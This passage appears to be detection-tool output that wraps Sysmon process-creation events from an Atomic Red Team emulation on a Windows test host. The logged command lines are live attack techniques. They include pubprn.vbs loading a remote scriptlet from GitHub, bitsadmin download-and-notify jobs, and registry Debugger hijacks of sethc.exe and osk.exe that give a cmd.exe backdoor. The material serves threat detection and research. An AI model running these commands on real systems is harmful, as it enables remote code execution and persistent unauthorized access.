<Data Name=""ParentProcessGuid"">747F3D96-D844-5D31-0000-001075082F00</Data>
<Data Name=""ParentProcessId"">7140</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547716.882586,2019-07-19T18:48:36.882586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:36.834888Z"">
</TimeCreated>
<EventRecordID>3668</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:36.811</Data>
<Data Name=""ProcessGuid"">747F3D96-D844-5D31-0000-001075082F00</Data>
<Data Name=""ProcessId"">7140</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost &quot; script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547716.834888,2019-07-19T18:48:36.834888+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:31.240293Z"">
</TimeCreated>
<EventRecordID>3667</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:31.222</Data>
<Data Name=""ProcessGuid"">747F3D96-D83F-5D31-0000-00105EF22E00</Data>
<Data Name=""ProcessId"">4888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547711.157171,2019-07-19T18:48:31.157171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /resume AtomicBITS&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:31.134374Z"">
</TimeCreated>
<EventRecordID>3665</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:31.115</Data>
<Data Name=""ProcessGuid"">747F3D96-D83F-5D31-0000-001001EC2E00</Data>
<Data Name=""ProcessId"">3760</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /resume AtomicBITS&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547711.04171,2019-07-19T18:48:31.041710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /complete AtomicBITS&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:31.012222Z"">
</TimeCreated>
<EventRecordID>3663</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:30.995</Data>
<Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-001046E52E00</Data>
<Data Name=""ProcessId"">4332</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /complete AtomicBITS&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.917348,2019-07-19T18:48:30.917348+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:30.900988Z"">
</TimeCreated>
<EventRecordID>3661</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:30.882</Data>
<Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-001088DE2E00</Data>
<Data Name=""ProcessId"">7072</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547710.807486,2019-07-19T18:48:30.807486+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:48:30.799468Z"">
</TimeCreated>
<EventRecordID>3659</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:48:30.775</Data>
<Data Name=""ProcessGuid"">747F3D96-D83E-5D31-0000-0010A2D72E00</Data>
<Data Name=""ProcessId"">4036</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547807.299766,2019-07-19T18:50:07.299766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:07.279972Z"">
</TimeCreated>
<EventRecordID>3733</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:07.254</Data>
<Data Name=""ProcessGuid"">747F3D96-D89F-5D31-0000-00106C7D3200</Data>
<Data Name=""ProcessId"">864</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547807.279972,2019-07-19T18:50:07.279972+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:02.249575Z"">
</TimeCreated>
<EventRecordID>3732</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:02.238</Data>
<Data Name=""ProcessGuid"">747F3D96-D89A-5D31-0000-0010F2703200</Data>
<Data Name=""ProcessId"">1132</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547802.194097,2019-07-19T18:50:02.194097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:02.174886Z"">
</TimeCreated>
<EventRecordID>3729</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:02.144</Data>
<Data Name=""ProcessGuid"">747F3D96-D89A-5D31-0000-0010A46B3200</Data>
<Data Name=""ProcessId"">1228</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547802.174886,2019-07-19T18:50:02.174886+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:49:52.275626Z"">
</TimeCreated>
<EventRecordID>3728</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:49:52.263</Data>
<Data Name=""ProcessGuid"">747F3D96-D890-5D31-0000-001085443200</Data>
<Data Name=""ProcessId"">4316</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
